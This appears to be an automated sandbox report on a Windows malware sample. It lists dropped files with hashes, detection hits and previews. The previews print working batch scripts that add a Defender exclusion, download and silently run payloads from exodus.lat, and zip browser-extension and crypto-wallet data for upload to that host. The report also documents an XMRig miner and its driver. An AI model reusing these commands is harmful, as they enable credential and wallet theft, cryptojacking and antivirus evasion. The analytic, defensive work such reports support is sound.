                                                                                            Preview:@echo off....:: Check if running as administrator..net session >nul 2>&1..if %errorlevel% neq 0 (.. powershell -WindowStyle Hidden -Command "Start-Process -FilePath '%~f0' -Verb runAs -WindowStyle Hidden".. exit /b..)....setlocal..set asmPath=%LocalAppData%\asm....:: Add exclusion path silently..powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%asmPath%'"....:: Create directory silently..if not exist "%asmPath%" mkdir "%asmPath%"....:: Download file silently..powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', '%asmPath%\COMSurrogate.exe') }"....:: Run the downloaded file silently..powershell -WindowStyle Hidden -Command "Start-Process -FilePath '%asmPath%\COMSurrogate.exe' -WindowStyle Hidden"....exit /b..

                                                                                            C:\Users\user\AppData\Local\Temp\downloaded_script.bat

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:DOS batch file, ASCII text, with very long lines (330), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):6492
                                                                                            Entropy (8bit):5.150016547022069
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:H0WFbS5g97ANfa5dJsw8oTaex8Z8zai8NI9qeaW:H04SmWYCQ8Z8zLJcPW
                                                                                            MD5:DA7552EED00789BD53F831E67CF54F8D
                                                                                            SHA1:653B2EC2B0975AB4B11F1C35A10E307C95450F17
                                                                                            SHA-256:5CB4DE27952514F557CF52A3A90B68F7C62A512732E799C766A85C4F7905F38F
                                                                                            SHA-512:F618164B414A91CCB3569B85FAD155FBB55DEFC55DFC5E2A48EE59F25307182AB2E3D9F8DDDFFC950CD6397442A876922608C0BBCC447EC0FC56F12446418BFC
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\downloaded_script.bat, Author: Joe Security
                                                                                            Preview:@echo off..setlocal enabledelayedexpansion....:: Set the necessary variables for extension and wallet settings..set "uploadUrl=https://exodus.lat/files/upload.php"..set "zipFile=%TEMP%\BrowserExtensionSettings.zip"..set "tempZipDir=%TEMP%\ArchiveContents"..set "foundExtensions=0"..set "foundWallets=0"..set "foundTdata=0"....:: Create temporary directory for all files..if exist "%tempZipDir%" rmdir /s /q "%tempZipDir%"..mkdir "%tempZipDir%"....:: Define wallet paths..set "walletPaths[Bitcoin]=AppData\Roaming\Bitcoin\wallets"..set "walletPaths[Zcash]=AppData\Roaming\Zcash"..set "walletPaths[Armory]=AppData\Roaming\Armory"..set "walletPaths[Bytecoin]=AppData\Roaming\bytecoin"..set "walletPaths[Jaxx]=AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb"..set "walletPaths[Exodus]=AppData\Roaming\Exodus\exodus.wallet"..set "walletPaths[Ethereum]=AppData\Roaming\Ethereum\keystore"..set "walletPaths[Electrum]=AppData\Roaming\Electrum\wallets"..set "walletPaths[AtomicWallet]=App

                                                                                            C:\Users\user\AppData\Local\Temp\runsteal.bat

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):399
                                                                                            Entropy (8bit):4.97289301435871
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:QbWsg2yw3bQblcnode8JGxSDa52zWr4HbR:72yw3OlcRUDa52rHbR
                                                                                            MD5:744F8978DB36B4B9DB7CB6E5C8C41E08
                                                                                            SHA1:84321921F622D20A4D40C9BEF43B7744E74AAEE7
                                                                                            SHA-256:CEDFE277F8C600679365CE2C54A9C303907A0ACADC23ED6E6968746D2E8CA468
                                                                                            SHA-512:D1584B2134BF3960AF33A514B3A9FBA69C7EB2FBBC3B0CFFE7E493F182B20547F7596012FCC5E6B5FFBEFEE5A0B7D1AFE45EEE822CFF5B0720FFD6292AF2394F
                                                                                            Malicious:true
                                                                                            Preview:@echo off..:: Set the URL of the .bat file and the path to save it..set "downloadUrl=https://exodus.lat/ss.bat"..set "tempBatFile=%TEMP%\downloaded_script.bat"....:: Download the .bat file using PowerShell..powershell -Command "Invoke-WebRequest -Uri '%downloadUrl%' -OutFile '%tempBatFile%' -UseBasicParsing"....:: Execute the downloaded .bat file silently..start "" /min cmd.exe /c "%tempBatFile%"

                                                                                            C:\Users\user\AppData\Local\Temp\smartscreen.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
                                                                                            File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):167936
                                                                                            Entropy (8bit):7.923035615805109
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:Ip7CBad9I6xjOCto1mb719Iz9cIp23YWMBjk3RzYISn7ApmHVlc+:Ip7CBad9I6xjD+sF9IKIgnwkRUbAI1l
                                                                                            MD5:1FED66D1F6B85BDA20FE0403CA01C9BD
                                                                                            SHA1:6A3056191A7D8DA167285B2BF5F9FA671022C8C1
                                                                                            SHA-256:924EE12F6A98AEEB1C7836EC8984F0F93216BFFF0433BCD4EE643D33D96DB74A
                                                                                            SHA-512:0FB1397078689A52D1C77CC239B1E42AFA5FF87A3F5B4F825705E9BDA1BD2C58BFB50A6067EA0A202FA7EDB0A890CBAC9314413FC8757C8B75A43FA0B12EF613
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 42%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....|..........."...0.................. ....@...... ....................................`...@......@............... ..............................................................<...T............................................................ ..P............text........ ...................... ..`.rsrc...............................@..@........................................H........~..l$...........)...U....................................................(....*.(...........s....s....%.o....%.o....o.... ....(....+....0..E........(....,,(......(.......(....,..(....r...p.(....(......&.. ....(....+............56.......0..H.......r...p.(....o.....~....r3..p.o......,....o.......r...p.o....(....(......*........//.......0..........~.....o....,.~....*~.....o....,.~....*~.....o....,.~....*~.....o....,.~....*~.....o....,.~....*~.....o....,.~....*~.....o....,.~....

                                                                                            C:\Users\user\AppData\Local\asm\COMSurrogate.exe

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):167936
                                                                                            Entropy (8bit):7.929204086294564
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:DlxjOCto1mb719Iz9cIp23YWMBjk3RzYISn7ApmHVVjKu:5xjD+sF9IKIgnwkRUbAI1F
                                                                                            MD5:77334F046A50530CDC6E585E59165264
                                                                                            SHA1:657A584EAFE86DF36E719526D445B570E135D217
                                                                                            SHA-256:EB6C487307C52793E0BC4D6A74770BBEA2322F32EDC466B25ABACEC3DD0E9C08
                                                                                            SHA-512:97936DD74D7EEF8D69DAE0D83B6D1554BD54D5302B5B2FF886FF66C040B083D7D086089DE12B57A491CF7269A7D076E4D2A52839AAAC519386B77297BC3A5C90
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0.................. ....@...... ....................................`...@......@............... ..............................................................\...T............................................................ ..P............text...).... ...................... ..`.rsrc...............................@..@........................................H..........."...........+...U....................................................(....*n(....(....o.... .'..(....+..0..3.......r...p.(....o.....~....r...p.o......,....o......&..*.........//.......0../.........(....}.......}......|......(...+..|....(....*..0..7.........(....}.......}.......}......|......(...+..|....(....*..(....*.ry..p.....r...p.....r...p.......(....r/..p(.........*....0..:........{......,..s....}......,Nr7..p~....rq..p(...........%.r...p~....s.........%.r...p.{....s

                                                                                            C:\Users\user\AppData\Local\asm\SHA256SUMS

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\asm\COMSurrogate.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):256
                                                                                            Entropy (8bit):4.609628268937494
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:FmPHPtVw0r8Xt1JEClzhtRRE0U17EBDjGVS4yo3TiRcVwkFFn:kvPfw0r891JEAzht0t17oDmvirkv
                                                                                            MD5:38F827A527025E0689A52EE3E8C95B98
                                                                                            SHA1:196C3449BA222213006849F95FE867DEE4551B70
                                                                                            SHA-256:00342F627A1776B6056A8E747439E92EE052DEE230041A5E22F0D42BF340AC5D
                                                                                            SHA-512:2B5D83C27DA5ABA1816EDC28471141226801D0054B4E8F583609F20B68398CCE3B11AFF1CEEC8A8E5A8E81938E9B663BD2E573452A6146CCD63BD947E1424826
                                                                                            Malicious:false
                                                                                            Preview:08e799194bcea78e2335b8f28bf5e5b0b799457167872dc3d9e40ad3cce9b6ab *nvrtc-builtins64_102.dll.79d9673dd7ff4ded9c9ba24a0bdb44f0309c5a2b9f9d618134a8668c7f193bd1 *nvrtc64_102_0.dll.9d3aa03f8a003a0142ca6bca93d8b86bc6785b5076d1d2a6528602c110d5e4eb *xmrig-cuda.dll.

                                                                                            C:\Users\user\AppData\Local\asm\WinRing0x64.sys

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\asm\COMSurrogate.exe
                                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):14544
                                                                                            Entropy (8bit):6.2660301556221185
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                            MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                            SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                            SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                            SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\asm\config.json

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\asm\COMSurrogate.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):2049
                                                                                            Entropy (8bit):4.53400832638798
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:vIuTHxiHLTsbNbGAS5J5hAv1SQ8d0Swr5m0SrC6O1cvWGAj7DFCz:wuTRgJIS4SeSr2Mp
                                                                                            MD5:DCB095940D9FB21102941FBEB7BBE9F7
                                                                                            SHA1:3C0D33B914BC5B174CD9C13427EC8700C09D96CA
                                                                                            SHA-256:BA88BBB257474D6D7E8E9BEC7A12FF826C3FA80CB019FBC92EA8D6253C2400B1
                                                                                            SHA-512:C384A68FAC9C301EFD695605E6B14E1E201BE687D99CC1E31C6ED2C3D17F37C28802179DD175B4AADB29A3DD6D808B203E18EE96DB63A5DBCB92C9D42D2036C2
                                                                                            Malicious:false
                                                                                            Preview:{. "api": {. "id": null,. "worker-id": null. },. "http": {. "enabled": false,. "host": "127.0.0.1",. "port": 0,. "access-token": null,. "restricted": true. },. "autosave": true,. "background": false,. "colors": true,. "title": true,. "randomx": {. "init": -1,. "init-avx2": -1,. "mode": "auto",. "1gb-pages": false,. "rdmsr": true,. "wrmsr": true,. "cache_qos": false,. "numa": true,. "scratchpad_prefetch_mode": 1. },. "cpu": {. "enabled": true,. "huge-pages": true,. "huge-pages-jit": false,. "hw-aes": null,. "priority": 3,. "memory-pool": false,. "yield": true,. "max-threads-hint": 60,. "asm": true,. "argon2-impl": null,. "cn/0": false,. "cn-lite/0": false. },. "opencl": {. "enabled": false,. "cache": true,. "loader": null,. "platform": "AMD",. "adl": true,. "cn/0": false,. "cn-lite/0": false. },. "cuda": {. "enabled": true,. "loader": null,. "nvml": true,.

                                                                                            C:\Users\user\AppData\Local\asm\mi.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\asm\COMSurrogate.exe
                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):6412800
                                                                                            Entropy (8bit):6.624511627494028
                                                                                            Encrypted:false
                                                                                            SSDEEP:98304:JtRK2Xvf49fuI0nBkLuFvJr4XGCkc/zF2fz5IZ4ePzpS+KdbjrD/6K+TU3nA:I2Xv42VKzYz6Z4qSndf3D+TU3A
                                                                                            MD5:F6D520AE125F03056C4646C508218D16
                                                                                            SHA1:F65E63D14DD57EADB262DEAA2B1A8A965A2A962C
                                                                                            SHA-256:D2FCF28897DDC2137141D838B734664FF7592E03FCD467A433A51CB4976B4FB1
                                                                                            SHA-512:D1EC3DA141CE504993A0CBF8EA4B719FFA40A2BE4941C18FFC64EC3F71435F7BDDADDA6032EC0AE6CADA66226EE39A2012079ED318DF389C7C6584AD3E1C334D
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\asm\mi.exe, Author: Joe Security
                                                                                            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\user\AppData\Local\asm\mi.exe, Author: unknown
                                                                                            • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\user\AppData\Local\asm\mi.exe, Author: Florian Roth
                                                                                            • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\user\AppData\Local\asm\mi.exe, Author: ditekSHen
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 63%
                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........{S.N.=.N.=.N.=..b>.B.=..b8..=..o9.].=..o>.D.=..o8...=..b9.W.=.o9.\.=.N.<...=..b<.Y.=...9.n.=.o4.G.=.o>.M.=.o..O.=.N...O.=.o?.O.=.RichN.=.........................PE..d...))'g.........."......VB..rI.......>........@.............................0............`.................................................T.\..........Y...................p........Y.......................Y.(.....Y.8............pB.p............................text...8TB......VB................. ..`.rdata..nw...pB..x...ZB.............@..@.data.....*...\.......\.............@....pdata................].............@..@_RANDOMXV.............`.............@..`_TEXT_CN.&.......(....`.............@..`_TEXT_CN..............`.............@..`_RDATA................`.............@..@.rsrc....Y.......Z....`.............@..@.reloc.......p.......$a.............@..B........................................

                                                                                            \Device\ConDrv

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\curl.exe
                                                                                            File Type:ASCII text, with CR, LF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):478
                                                                                            Entropy (8bit):3.065498569262554
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgcdSgOgcdivId22PVW4/UYAn:Vz6ykymUexb1U9cL9cddbPVW4On
                                                                                            MD5:895D12077AC121B410C13FD8EBFA84EF
                                                                                            SHA1:930CA09110FAA76691F01F52E5E03BA66DAD8436
                                                                                            SHA-256:79B0737E1CCAF5AE48117B23C1FB3A492DD31B21CFA48C0AF4E2437379165723
                                                                                            SHA-512:4C1AAF22A1315B69C80EC0B42305A75E86F7E81F9B5F020BF197D7A7271042D830A3E7AF26A842EFF5F71B4960DF80BDD96CD464ADD0864A83177E721A07430A
                                                                                            Malicious:false
                                                                                            Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0.100 2556 100 86 100 2470 43 1252 0:00:02 0:00:01 0:00:01 1296..

                                                                                            \Device\Null

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):682
                                                                                            Entropy (8bit):4.907497847855632
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:oPaYeb8rcHEZrENtaYeb8rcHEZrEqkaYeb8rcHEZrE5XaYeb8rcHEZrEqaYeb8r7:oPaYeb8nZrEPaYeb8nZrEqkaYeb8nZro
                                                                                            MD5:F4C4729AE652B1F97AF36572C6EBC890
                                                                                            SHA1:F4404BEFC614618CE98E95CD3FBA8E720F51B9B5
                                                                                            SHA-256:0E78570EEC12F8E2E6C33FE93224D5ABD9B8AC5DB6AF5293FBCFEC27C1FC24E1
                                                                                            SHA-512:97D0D5B3159D16650A720953315E9711A62168BCE970E799E45EBDB534A7A045524AEDA52987C301FE821E305AAC0676B46B8696AF772D123D164C720522F824
                                                                                            Malicious:false
                                                                                            Preview:C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\000003.log..C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\CURRENT..C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOCK..C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG..C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\MANIFEST-000001..5 File(s) copied..

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.999048531814604
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:DM6vAAgoCw.exe
                                                                                            File size:7'284'070 bytes
                                                                                            MD5:a67e34baacfca98f323981d3b0087f3b
                                                                                            SHA1:d22ccae2971df83812acaebc750d9a2c87357fe5
                                                                                            SHA256:6092579a997945b10d3f279693baa004d180417ccfec941c45eb20705a2b4706
                                                                                            SHA512:39c7a33ab14e518a09f4e022c1c61c8b5a88417af3ce5a1769ab8c0fa328a178fcd79a098c4c7f3344df75e2b7cd22ebf6a88d43ad61599c53a3c89d54c29d6d
                                                                                            SSDEEP:196608:cALE6dWjWnulUCK9vDfaa1RkYP60bs25rXSNBl66Wncma:a6fuiPrfZ1RBP60bs25rXQ66WnG
                                                                                            TLSH:1F7633745E1BFAB3E45A2E78AA315F75F9EB9F124C408E4B1059E66C9130B161CB30B3
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

                                                                                            File Icon

                                                                                            Icon Hash:ccb8a06d6d3b9ecc

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x4038af
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:true
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:5
                                                                                            OS Version Minor:0
                                                                                            File Version Major:5
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:5
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                            Authenticode Signature

                                                                                            Signature Valid:false
                                                                                            Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                            Error Number:-2146869232
                                                                                            Not Before, Not After
                                                                                            • 11/10/2023 20:00:00 11/10/2026 19:59:59
                                                                                            Subject Chain
                                                                                            • CN=Anvsoft Inc., O=Anvsoft Inc., S=\u5e7f\u4e1c\u7701, C=CN, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=CN, SERIALNUMBER=91440300678599838F
                                                                                            Version:3
                                                                                            Thumbprint MD5:EC7B36F045D3BB302D05569D0BD6531F
                                                                                            Thumbprint SHA-1:9F99B788DFFFB11844E772AFFEC29DD91B12B8BC
                                                                                            Thumbprint SHA-256:76526A2214EE71A25AA57B9EAF03D64B0F146BE5562E2568FA089653FE4A07B9
                                                                                            Serial:6E6AEF9D6F88948F39C9D04ACD49007B

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            sub esp, 000002D4h
                                                                                            push ebx
                                                                                            push ebp
                                                                                            push esi
                                                                                            push edi
                                                                                            push 00000020h
                                                                                            xor ebp, ebp
                                                                                            pop esi
                                                                                            mov dword ptr [esp+18h], ebp
                                                                                            mov dword ptr [esp+10h], 0040A268h
                                                                                            mov dword ptr [esp+14h], ebp
                                                                                            call dword ptr [00409030h]
                                                                                            push 00008001h
                                                                                            call dword ptr [004090B4h]
                                                                                            push ebp
                                                                                            call dword ptr [004092C0h]
                                                                                            push 00000008h
                                                                                            mov dword ptr [0047EB98h], eax
                                                                                            call 00007FB1887C640Bh
                                                                                            push ebp
                                                                                            push 000002B4h
                                                                                            mov dword ptr [0047EAB0h], eax
                                                                                            lea eax, dword ptr [esp+38h]
                                                                                            push eax
                                                                                            push ebp
                                                                                            push 0040A264h
                                                                                            call dword ptr [00409184h]
                                                                                            push 0040A24Ch
                                                                                            push 00476AA0h
                                                                                            call 00007FB1887C60EDh
                                                                                            call dword ptr [004090B0h]
                                                                                            push eax
                                                                                            mov edi, 004CF0A0h
                                                                                            push edi
                                                                                            call 00007FB1887C60DBh
                                                                                            push ebp
                                                                                            call dword ptr [00409134h]
                                                                                            cmp word ptr [004CF0A0h], 0022h
                                                                                            mov dword ptr [0047EAB8h], eax
                                                                                            mov eax, edi
                                                                                            jne 00007FB1887C39DAh
                                                                                            push 00000022h
                                                                                            pop esi
                                                                                            mov eax, 004CF0A2h
                                                                                            push esi
                                                                                            push eax
                                                                                            call 00007FB1887C5DB1h
                                                                                            push eax
                                                                                            call dword ptr [00409260h]
                                                                                            mov esi, eax
                                                                                            mov dword ptr [esp+1Ch], esi
                                                                                            jmp 00007FB1887C3A63h
                                                                                            push 00000020h
                                                                                            pop ebx
                                                                                            cmp ax, bx
                                                                                            jne 00007FB1887C39DAh
                                                                                            add esi, 02h
                                                                                            cmp word ptr [esi], bx

                                                                                            Rich Headers

                                                                                            Programming Language:
                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                            • [ C ] VS2010 SP1 build 40219
                                                                                            • [RES] VS2010 SP1 build 40219
                                                                                            • [LNK] VS2010 SP1 build 40219

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x20eb6.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x6ec5160x6050
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x1000000x20eb60x21000225f0ef94c66f4318e4f7cae39f9f390False0.9587328361742424data7.8565084109257155IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0x1210000xfd60x1000bcc1b865322f974509fa95be60f483c2False0.596923828125data5.562954404310927IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_ICON0x1002200x1416dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9940329343136659
                                                                                            RT_ICON0x1143900x78e3PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9992891071832488
                                                                                            RT_ICON0x11bc740x2648PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0011224489795918
                                                                                            RT_ICON0x11e2bc0x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.5896053702196908
                                                                                            RT_DIALOG0x1209240x100dataEnglishUnited States0.5234375
                                                                                            RT_DIALOG0x120a240x11cdataEnglishUnited States0.6056338028169014
                                                                                            RT_DIALOG0x120b400x60dataEnglishUnited States0.7291666666666666
                                                                                            RT_GROUP_ICON0x120ba00x3eTarga image data - Map 32 x 16749 x 1 +1EnglishUnited States0.8387096774193549
                                                                                            RT_MANIFEST0x120be00x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                            Imports

                                                                                            DLLImport
